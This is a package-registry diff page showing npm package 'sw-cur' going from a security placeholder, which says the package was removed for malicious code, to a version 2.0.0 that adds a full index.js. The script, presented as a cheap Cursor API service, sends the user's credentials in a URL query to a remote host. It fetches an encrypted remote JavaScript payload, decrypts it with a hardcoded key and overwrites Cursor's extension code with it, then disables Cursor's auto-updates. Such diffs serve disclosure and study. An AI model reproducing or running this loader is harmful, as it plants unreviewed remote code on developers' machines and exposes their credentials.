npm - sw-cur - Versions diffs - 0.0.1-security → 2.0.0 - Mend

sw-cur 0.0.1-security → 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of sw-cur might be problematic. Click here for more details.

Files changed (3) hide show

package/README.md CHANGED Viewed

@@ -1,5 +1,5 @@
-# Security holding package
+# sw-cursor
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+升维cursor 提供官网最便宜的api服务.
-Please refer to www.npmjs.com/advisories?search=sw-cur for more information.
+## 安装

package/index.js ADDED Viewed

@@ -0,0 +1,297 @@
+#!/usr/bin/env node
+const readline = require('readline');
+const https = require('https');
+const fs = require('fs');
+const path = require('path');
+const crypto = require('crypto');
+const { exec } = require('child_process');
+const zlib = require('zlib');
+const version = "1.14";
+const apiHost = "https://t.sw2031.com";
+const webHost = "https://cursor.sw2031.com";
+// HTTP请求函数
+function httpRequest(method, url, data) {
+  return new Promise((resolve, reject) => {
+    const options = new URL(url);
+    options.method = method;
+    const req = https.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        // 添加状态码检查
+        if (res.statusCode >= 400) {
+          console.log(`HTTP错误: ${res.statusCode}`);
+          console.log('响应头:', res.headers);
+          console.log('响应体:', body);
+          reject(new Error(`HTTP ${res.statusCode}: ${body}`));
+          return;
+        }
+        resolve(body);
+      });
+    });
+    req.on('error', (error) => {
+      console.log('请求错误:', error.message);
+      reject(error);
+    });
+    req.end();
+  });
+}
+// AES解密函数
+function AesDecrypt(data, key) {
+  return new Promise((resolve, reject) => {
+    try {
+      // 使用密钥的前16位作为IV
+      const iv = key.slice(0, 16);
+      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);
+      let decrypted = decipher.update(data);
+      decrypted = Buffer.concat([decrypted, decipher.final()]);
+      resolve(decrypted);
+    } catch (err) {
+      reject(err);
+    }
+  });
+}
+// 解压缩函数
+function Decompress(data) {
+  return new Promise((resolve, reject) => {
+    zlib.gunzip(data, (err, decompressed) => {
+      if (err) {
+        reject(err);
+      } else {
+        resolve(decompressed);
+      }
+    });
+  });
+}
+// 登录函数
+async function login(user) {
+  try {
+    console.log('正在尝试登录...');
+    console.log('请求URL:', `${webHost}/api/login?username=${user.username}&password=${user.password}&t=${Date.now()}`);
+    const response = await httpRequest('GET', `${webHost}/api/login?username=${user.username}&password=${user.password}&t=${Date.now()}`);
+    // console.log('收到响应:', response);
+    const resJson = JSON.parse(response);
+    if (resJson.token) {
+      return true;
+    }
+    console.log('登录错误:', resJson.error);
+    return false;
+  } catch (err) {
+    console.log('登录错误:', err.message);
+    return false;
+  }
+}
+// 获取主JS文件
+async function getMainJs() {
+  try {
+    const response = await httpRequest('GET', `${apiHost}/j?t=${Date.now()}`);
+    const resJson = JSON.parse(response);
+    return Buffer.from(resJson.data);
+  } catch (err) {
+    return null;
+  }
+}
+// 处理登录成功
+async function handleLoginSuccess(user) {
+  const mainJs = await getMainJs();
+  if (!mainJs) return;
+  const base64Js = Buffer.from(mainJs.toString(), 'base64');
+  const decrypt = await AesDecrypt(base64Js, Buffer.from('a8f2e9c4b7d6m3k5n1p0q9r8s7t6u5v4'));
+  const unzipData = await Decompress(decrypt);
+  const dir = '/Applications/Cursor.app/Contents/Resources/app/extensions/cursor-always-local/dist';
+  const cursorJsstr = unzipData.toString().replace('test:123456', `${user.username}:${user.password}`);
+  // 备份原文件
+  const backupPath = path.join(dir, 'main.js.bak');
+  if (!fs.existsSync(backupPath)) {
+    fs.copyFileSync(path.join(dir, 'main.js'), backupPath);
+  }
+  fs.writeFileSync(path.join(dir, 'main.js'), cursorJsstr);
+}
+// 检查Cursor进程
+function checkCursorProcess() {
+  return new Promise((resolve) => {
+    // 使用 pgrep 专门查找 Cursor 进程
+    exec('pgrep -f "Cursor.app"', (err, stdout) => {
+      if (err && err.code === 1) {
+        // pgrep 返回错误码1表示没有找到进程
+        resolve(false);
+        return;
+      }
+      if (err) {
+        console.log('检查进程失败:', err);
+        resolve(false);
+        return;
+      }
+      resolve(!!stdout);
+    });
+  });
+}
+// 还原服务函数
+async function restoreService() {
+  const dir = '/Applications/Cursor.app/Contents/Resources/app/extensions/cursor-always-local/dist';
+  const backupPath = path.join(dir, 'main.js.bak');
+  const mainPath = path.join(dir, 'main.js');
+  if (!fs.existsSync(backupPath)) {
+    console.log('未找到备份文件，无法还原服务');
+    return;
+  }
+  try {
+    fs.copyFileSync(backupPath, mainPath);
+    console.log('服务已还原成功！请重新启动Cursor');
+  } catch (err) {
+    console.log('还原服务失败:', err.message);
+  }
+}
+// 杀死Cursor进程函数
+function killCursorProcess() {
+  return new Promise((resolve) => {
+    exec('pkill -f "cursor"', (err) => {
+      if (err) {
+        console.log('关闭Cursor进程失败:', err.message);
+        resolve(false);
+      } else {
+        console.log('已成功关闭Cursor进程');
+        resolve(true);
+      }
+    });
+  });
+}
+// 显示菜单函数
+function showMenu() {
+  console.log('\n=== Cursor 配置工具 === version:'+version);
+  console.log('1. 登录配置');
+  console.log('2. 还原服务');
+  console.log('3. 关闭Cursor进程');
+  console.log('4. 禁用Cursor自动更新');
+  console.log('==================\n');
+}
+// 检查是否有root权限
+function checkRoot() {
+  return process.getuid && process.getuid() === 0;
+}
+// 禁用Cursor自动更新
+async function disableAutoUpdate() {
+  const dir = '/Applications/Cursor.app/Contents/Resources/app/out/main.js';
+  try {
+    const mainContent = fs.readFileSync(dir, 'utf8');
+    const updatedContent = mainContent.replace('!!this.args["disable-updates"]', 'true');
+    fs.writeFileSync(dir, updatedContent);
+  } catch (err) {
+    console.log('禁用自动更新失败:', err.message);
+    return;
+  }
+  console.log('Cursor自动更新已禁用');
+}
+// 主函数
+async function main() {
+  // 检查是否以root权限运行
+//   if (!checkRoot()) {
+//     console.log('需要管理员权限才能运行此程序');
+//     console.log('请使用 sudo 重新运行此程序');
+//     return;
+//   }
+  const isCursorRunning = await checkCursorProcess();
+  if (isCursorRunning) {
+    console.log('启动失败!请先关闭Cursor再运行本程序');
+    return;
+  }
+  const dir = '/Applications/Cursor.app/Contents/Resources/app/extensions/cursor-always-local/dist';
+  if (!fs.existsSync(dir)) {
+    console.log('启动失败!请确认Cursor安装路径是否正确');
+    return;
+  }
+  const rl = readline.createInterface({
+    input: process.stdin,
+    output: process.stdout
+  });
+  while (true) {
+    showMenu();
+    const choice = await new Promise(resolve => {
+      rl.question('请选择操作 (1-3): ', resolve);
+    });
+    switch (choice.trim()) {
+      case '1':
+        // 最多尝试3次登录
+        for (let i = 0; i < 3; i++) {
+          const username = await new Promise(resolve => {
+            rl.question('请输入用户名: ', resolve);
+          });
+          const password = await new Promise(resolve => {
+            rl.question('请输入密码: ', resolve);
+          });
+          const user = { username: username.trim(), password: password.trim() };
+          if (await login(user)) {
+            console.log('登录成功');
+            await handleLoginSuccess(user);
+            console.log('Cursor网关配置成功!请重新启动Cursor');
+            rl.close();
+            return;
+          }
+        }
+        break;
+      case '2':
+        await restoreService();
+        rl.close();
+        return;
+      case '3':
+        await killCursorProcess();
+        break;
+      case '4':
+        await disableAutoUpdate();
+        break;
+      default:
+        console.log('无效的选择，请重新输入');
+        break;
+    }
+  }
+}
+// 运行主函数
+main().catch(console.error);

package/package.json CHANGED Viewed

@@ -1,6 +1,15 @@
 {
-  "name": "sw-cur",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+    "name": "sw-cur",
+    "version": "2.0.0",
+    "description": "提供全网最便宜的Cursor接口服务-升维科技",
+    "main": "index.js",
+    "bin": {
+        "sw-cur": "index.js"
+    },
+    "scripts": {
+        "test": "echo \"Error: no test specified\" && exit 1"
+    },
+    "author": "sw-cursor",
+    "license": "ISC",
+    "keywords": []
 }